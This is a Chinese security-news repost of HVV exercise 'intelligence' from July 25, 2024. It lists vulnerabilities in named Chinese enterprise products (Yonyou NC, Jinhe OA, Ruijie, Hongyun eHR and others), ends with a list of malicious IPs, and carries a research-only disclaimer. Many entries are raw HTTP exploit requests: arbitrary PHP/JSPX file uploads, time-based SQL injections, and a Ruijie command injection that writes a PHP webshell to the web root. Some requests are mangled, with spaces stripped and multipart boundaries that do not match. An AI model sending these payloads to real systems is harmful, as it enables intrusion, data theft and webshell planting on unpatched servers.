7.25hvv情报

admin 2024年7月26日00:57:34评论161 views字数 4547阅读15分9秒阅读模式
云课网校系统 uploadlmage 任意文件上传漏洞
POST /api/uploader/uploadImage HTTP/1.1
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykvjj6DIn0LIXxe9m
x-requested-with: XMLHttpRequest

------WebKitFormBoundaryLZbmKeasWgo2gPtU
Content-Disposition: form-data; name="file"; filename="11.php"
Content-Type: image/gif

111
------WebKitFormBoundaryLZbmKeasWgo2gPtU--


用友NC querygoodsgridbycode SQL注入漏洞

TOTOlink A6000R 命令执行漏洞(CVE-2024-41319)

金和OAC6GeneralXmlhttpPage.aspx SQL注入漏洞
GET
/C6/Jhsoft.Web.appraise/AppraiseScoreUpdate.aspx/GeneralxmlhttpPage.aspx/?id
=%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A4
HTTP/1.1
Host:

红海云eHRkqFile.mob 任意文件上传
POST/RedseaPlatform/kqFile.mob?method=uploadFile&fileName=123.jspx
HTTP/1.1
Host:
Pragma:no-cache
Cache-Control:no-cache
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/126.0.0.0Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:JSE
Connection:close
Content-Type:multipart/form-data;
boundary=----WebKitformBoundaryS7jL1beJUXUUnhE8
Content-Length:480------WebKitformBoundaryS7jL1beJUXUUnhE8
Content-Disposition:form-data;name="fj_file";filename=|$|"222.jpg"|$|
<jsp:rootversion="2.0"xmlns:jsp="http://java.sun.com/JSP/Page">
<jsp:directive.pagecontentType="text/html"/>
<jsp:directive.pagepageEncoding="UTF-8"/>
jsp:scriptlet<![CDATA[
out.print(123456);
]]></jsp:scriptlet>
</jsp:root>------WebKitformBoundaryS7jL1beJUXUUnhE8--


锐捷统一上网行为管理与审计系统static_convert.php命令注入漏洞
GET/view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27<?php%20sy
stem("id");unlink(__FILE__);?>%27%20>/var/www/html/rce.phpHTTP/1.1
Host:your-ip
Accept:application/json,text/javascript,*/*
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/122.0.0.0Safari/537.36
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9
Connection:close

数字通云平台智慧政务 timeSQL注入漏洞
GET/payslip/search/index/userid/time/time?PayslipUser[user_id]=%28SELECT+4655
+FROM+%28SELECT%28SLEEP%285%29%29%29usQE%29HTTP/1.1
Host:
Accept-Encoding:gzip,deflate
Connection:keep-alive


飞讯云 WMS/MyDown/MyImportData 前台SQL注入
GET/MyDown/MyImportData?opeid=72000301'HTTP/1.1
Host:
Pragma:no-cache
Cache-Control:no-cache
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36
(KHTML,likeGecko)Chrome/126.0.0.0Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,i
mage/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie:JSESSID
Language=zh-CN
Connection:close


飞讯云 WMS /MyDown/MyImportData 前台SQL注入,已存在,待披露

【预警】某信服VPN多个0day漏洞
今日,外界流传某信服VPN存在三个0day漏洞,目前暂未披露,请直接联系官方确认

金和OA C6 DownLoadBglmage 未授权 任意文件读取漏洞

金和OA UploadFileDownLoadnew 未授权 任意文件读取漏洞

金慧-综合管理信息系统-sql注入

科讯校园一卡通管理系统 dormitoryHealthRanking SQL注入漏洞
GET/api/get_kq_tj_today?KaID=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

用友时空 PreviewKPQT sql注入漏洞

用友NC LoggingConfigServlet 反序列化漏洞

泛微e-cology getFileViewUrl SSRF漏洞

湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞

科荣AIO moffice 存在SQL注入漏洞


华磊科技物流modifyInsurance存在sql注入漏洞
GET/modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br

Connection: close

0725恶意IP威胁情报
60.163.11.198

60.174.26.232

170.106.115.173

223.104.38.57

220.180.66.213

223.247.61.67

220.180.67.232

121.226.83.81

87.236.176.111

87.236.176.107

8.210.16.247

60.205.190.28

39.105.124.82

167.71.58.10

80.230.158.16

103.40.103.136

43.250.173.243

36.151.55.82

154.38.91.159

43.250.173.241

103.3.83.133

43.250.173.94

45.132.237.148

63.141.240.250

120.85.114.81

103.68.195.58


150.109.13.165

120.26.54.108

150.185.5.5

65.49.20.81

180.101.88.201

91.92.242.152

52.230.152.146

218.92.0.56

91.203.177.71

139.59.31.108

--来自互联网

7.25hvv情报

原文始发于微信公众号(飓风网络安全):7.25hvv情报

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月26日00:57:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   7.25hvv情报https://cn-sec.com/archives/2998860.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息